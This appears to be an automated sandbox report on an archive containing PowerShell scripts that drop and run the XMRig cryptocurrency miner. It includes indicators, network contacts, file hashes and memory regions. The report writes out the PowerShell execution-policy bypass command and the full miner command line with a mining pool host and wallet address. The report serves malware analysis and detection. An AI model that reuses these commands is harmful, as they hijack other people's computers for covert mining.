Malware Analysis Report

2025-04-19 18:43

Sample ID 240527-ar46zshf21
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:48

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/1516-0-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnavl4cd.3bz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1516-6-0x0000025E40170000-0x0000025E40192000-memory.dmp

memory/1516-11-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

memory/1516-12-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

memory/1516-14-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

memory/1516-15-0x0000025E40C80000-0x0000025E40C92000-memory.dmp

memory/1516-16-0x0000025E401B0000-0x0000025E401BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3608-47-0x0000026819C00000-0x0000026819C20000-memory.dmp

memory/3608-48-0x000002681B400000-0x000002681B420000-memory.dmp

memory/3608-49-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-50-0x000002681B420000-0x000002681B440000-memory.dmp

memory/3608-51-0x000002681B440000-0x000002681B460000-memory.dmp

memory/3608-52-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/1516-53-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmp

memory/1516-54-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

memory/3608-55-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-56-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-58-0x000002681B440000-0x000002681B460000-memory.dmp

memory/3608-57-0x000002681B420000-0x000002681B440000-memory.dmp

memory/3608-59-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-60-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-61-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-62-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-63-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-64-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-65-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-66-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-67-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-68-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-69-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-70-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-71-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-72-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-73-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-74-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-75-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-76-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-77-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-78-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-79-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-80-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-81-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-82-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-83-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-84-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-85-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-86-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-87-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-88-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-89-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-90-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-91-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-92-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-93-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-94-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-95-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-96-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-97-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-98-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-99-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-100-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-101-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-102-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-103-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-104-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-105-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-106-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-107-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-108-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-109-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-110-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-111-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-112-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-113-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-114-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-115-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-116-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

memory/3608-117-0x00007FF7CF520000-0x00007FF7D0153000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:33

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

memory/5044-0-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zisvag1p.5y5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5044-6-0x000001AB746A0000-0x000001AB746C2000-memory.dmp

memory/5044-10-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/5044-11-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/5044-12-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/5044-14-0x000001AB74950000-0x000001AB74962000-memory.dmp

memory/5044-15-0x000001AB74710000-0x000001AB7471A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3444-46-0x000002416A3D0000-0x000002416A3F0000-memory.dmp

memory/3444-47-0x000002416BDC0000-0x000002416BDE0000-memory.dmp

memory/3444-48-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/5044-49-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

memory/5044-50-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3444-52-0x000002416BE00000-0x000002416BE20000-memory.dmp

memory/3444-51-0x000002416BDE0000-0x000002416BE00000-memory.dmp

memory/3444-53-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-54-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-55-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-56-0x000002416BDE0000-0x000002416BE00000-memory.dmp

memory/3444-57-0x000002416BE00000-0x000002416BE20000-memory.dmp

memory/3444-58-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-59-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-60-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-61-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-62-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-63-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-64-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-65-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-66-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-67-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-68-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-69-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-70-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-71-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-72-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-73-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-74-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-75-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-76-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-77-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-78-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-79-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-80-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-81-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-82-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-83-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-84-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-85-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-86-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-87-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-88-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-89-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-90-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-91-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-92-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-93-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-94-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-95-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-96-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-97-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-98-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-99-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-100-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-101-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-102-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-103-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-104-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-105-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-106-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-107-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-108-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-109-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-110-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-111-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-112-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-113-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-114-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-115-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

memory/3444-116-0x00007FF7B02D0000-0x00007FF7B0F03000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:47

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
